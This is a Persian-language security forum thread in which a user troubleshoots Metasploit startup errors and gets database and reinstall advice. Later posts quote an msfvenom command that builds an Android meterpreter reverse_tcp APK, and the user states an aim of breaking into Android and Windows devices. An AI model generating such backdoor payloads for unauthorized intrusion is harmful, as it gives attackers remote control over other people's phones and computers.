discord icon
سرور دیسکورد گاردایران

پست های پیشنهاد شده

سلام دوستان عزیز من در اجرای متاسپلویت مشکل دارم وقتی دستور msfconsole میزنم متاسپلویت اجرا نمیشه و اروری که عکسشو گذاشتمو میده لطفا کمکم کنید .

20180618_213103.jpg

20180618_213148.jpg

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

سلام اگر این مشکل رو دارید و این اررور رو میگیرید:

Database not connected or cache not built, using slow search

این اررور بدلیل متصل نبودن متااسپلویت به دیتابیس  و ایجاد نشدن حافظه کش برای جستجو ایجاد میشود...

برای اینکار میبایست  دستورات زیر را  وارد کنید (درصورتی که مشکل از پایگاه داده باشد)

sudo service postgresql start

sudo service metasploit start

و در صورتی که مشکل از حافظه موقت باشد(cache) میبایست دستورات زیررا وارد کنید:

db_rebuild_cache

و برای پایدار ساختن تنظیمات برنامه از دستور زیر استفاده کنید: 

update-rc.d postgresql enable

update-rc.d metasploit enable

اگه سوالی داشتی بپرس:/

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در ۱ ساعت قبل، DSh_A گفته است :

سلام اگر این مشکل رو دارید و این اررور رو میگیرید:

Database not connected or cache not built, using slow search

این اررور بدلیل متصل نبودن متااسپلویت به دیتابیس  و ایجاد نشدن حافظه کش برای جستجو ایجاد میشود...

برای اینکار میبایست  دستورات زیر را  وارد کنید (درصورتی که مشکل از پایگاه داده باشد)

sudo service postgresql start

sudo service metasploit start

و در صورتی که مشکل از حافظه موقت باشد(cache) میبایست دستورات زیررا وارد کنید:

db_rebuild_cache

و برای پایدار ساختن تنظیمات برنامه از دستور زیر استفاده کنید: 

update-rc.d postgresql enable

update-rc.d metasploit enable

اگه سوالی داشتی بپرس:/

ﺳﻼﻡ ﻣﻤﻨﻮﻥ ﺑﺎﺑﺖ ﺭاﻫﻨﻤﺎﻳﻲ ﻭﻟﻲ ﺑﺎﺯﻡ ﻧﺸﺪ ﻫﻢ ﺗﻮﻱ ﮔﻮﺷﻴﻢ اﻳﻦﺟﻮﺭﻱ ﻣﻴﺸﻪ ﻫﻢ ﻛﺎﻣﭙﻴﻮﺗﺮ , ﻧﻤﻴﺪﻭﻧﻢ اﺯ ﭼﻴﻪ ﻧﻪ ﻣﻴﺘﻮﻧﻢ ﭘﻴﻠﻮﺩ ﺑﺴﺎﺯﻡ ﭘﻪ ﻣﺘﺎﺳﭙﻠﻮﻳﺖ اﺟﺭا ﻛﻨﻢ ﻭﻟﻲ ﺑﻌﻀﻲ ﻭﻗﺘﺎ ﻫﺮﺩﻭﺗﺎ اﺟﺮا ﻣﻴﺸﻪ ﻣﺜﻼ ﺷﺎﻳﺪ ﻫﺮ ﭘﻮﻧﺰﺩﻩ ﺑﻴﺴﺖ ﺑﺎﺭ ﻳﺒﺎﺭ اﺟﺮا ﺑﺸﻪ , اﻳﻦ اﺭﻭﺭﻭ ﻳﻪ ﺻﻔﺤﻪ ﻫﺴﺘﺶ ﺁﺩﻡ ﻧﻤﻴﺘﻮﻧﻪ ﺳﺮﭺ ﻛﻨﻪ 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

متاسفانه اررور شما رو نداشتم و نمیدونم رفعش کنم... 

این اررور رو داشتم و یک راه حل دادم شاید بدردتون بخوره...

یه جستجو در اینترنت بزنید اطلاعات خوبی نسیبتون میشه...

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 18 ساعت قبل، biowulf گفته است :

سلام دوستان عزیز من در اجرای متاسپلویت مشکل دارم وقتی دستور msfconsole میزنم متاسپلویت اجرا نمیشه و اروری که عکسشو گذاشتمو میده لطفا کمکم کنید .

20180618_213103.jpg

20180618_213148.jpg

سلام دوست عزیز

 

راستش این range error های متفاوتی من تو اینترنت دیدم در این باره و خیلی هم متفاوت بودن از هم . من چیزی که به ذهنم رسید اینه یک بار حذف و دوباره نصبش کنید . فک می کنم مشکل هرچی بوده حل شه. یعنی امیدوارم.

برای حذف :

cd ~/opt/metasploit-4.x.x
./ctlscript.sh.stop
./uninstall

فقط دقت کنید به جای x هایی که گذاشتم ورژن متاسپلویتتون و وارد کنید. چند تا سوال بلی و خیر هم بعدش می پرسه که خیلی در جواب دادنش دقت کنید چون تو نصب دوبارش دچار مشکل می شید ولی چیز خاصی نداره.

برای نصب دوبارش :

service postgresql start
msfdb init
msfconsole

اگر بازم خدایی نکرده تو نصبش مشکل پیش اومد تاپیک بزارید توضیح بدم خدمتتون.

 

سپاس

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 23 ساعت قبل، abarestan گفته است :

سلام دوست عزیز

 

راستش این range error های متفاوتی من تو اینترنت دیدم در این باره و خیلی هم متفاوت بودن از هم . من چیزی که به ذهنم رسید اینه یک بار حذف و دوباره نصبش کنید . فک می کنم مشکل هرچی بوده حل شه. یعنی امیدوارم.

برای حذف :


cd ~/opt/metasploit-4.x.x
./ctlscript.sh.stop
./uninstall

فقط دقت کنید به جای x هایی که گذاشتم ورژن متاسپلویتتون و وارد کنید. چند تا سوال بلی و خیر هم بعدش می پرسه که خیلی در جواب دادنش دقت کنید چون تو نصب دوبارش دچار مشکل می شید ولی چیز خاصی نداره.

برای نصب دوبارش :


service postgresql start
msfdb init
msfconsole

اگر بازم خدایی نکرده تو نصبش مشکل پیش اومد تاپیک بزارید توضیح بدم خدمتتون.

 

سپاس

ممنون درست شد . اما حالا متاسپلویت رو اجرا میکنه ولی موقع ساخت پیلود همون ارور رو میده مثلا :

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -o filename.apk 

مثلا این دستورو میزنم همون ارور میاد اما دستور msfconsole بدون مشکل اجرا میشه و کارشو ادامه میده . ( دستور بالا فقط مثال بود ) . بازم ممنون میشم کمکم کنید

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 8 دقیقه قبل، biowulf گفته است :

ممنون درست شد . اما حالا متاسپلویت رو اجرا میکنه ولی موقع ساخت پیلود همون ارور رو میده مثلا :

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -o filename.apk 

مثلا این دستورو میزنم همون ارور میاد اما دستور msfconsole بدون مشکل اجرا میشه و کارشو ادامه میده . ( دستور بالا فقط مثال بود ) . بازم ممنون میشم کمکم کنید

 

با سلام
دوست عزیز من 2 سال قبل 2ماه تمام رویه این روشی که الان شما داری روش کار میکنی وقت گذاشتم تمام مشکلاتیم که الان شما داری رو داشتم !
بعضی از اون مشکلا حل شد بعضی هم نه! از من میشنوی بیخیال این روش واسه نفوذ به اندروید شو و راه های دیگرو امتحان کن....

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 55 دقیقه قبل، Barc0d گفته است :

با سلام
دوست عزیز من 2 سال قبل 2ماه تمام رویه این روشی که الان شما داری روش کار میکنی وقت گذاشتم تمام مشکلاتیم که الان شما داری رو داشتم !
بعضی از اون مشکلا حل شد بعضی هم نه! از من میشنوی بیخیال این روش واسه نفوذ به اندروید شو و راه های دیگرو امتحان کن....

آخه میدونین هم توی کالی نت هانتر موبایلم هم کالی لینوکس لپتاپم این مشکلو دارم درحالی که نسخه های خیلی متفاوت هستن ، خب راه های دیگه نفوذ به ویندوز و اندروید شما چه راه هایی رو میگید که این مشکلو نداشته باشم باهاش ؟

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری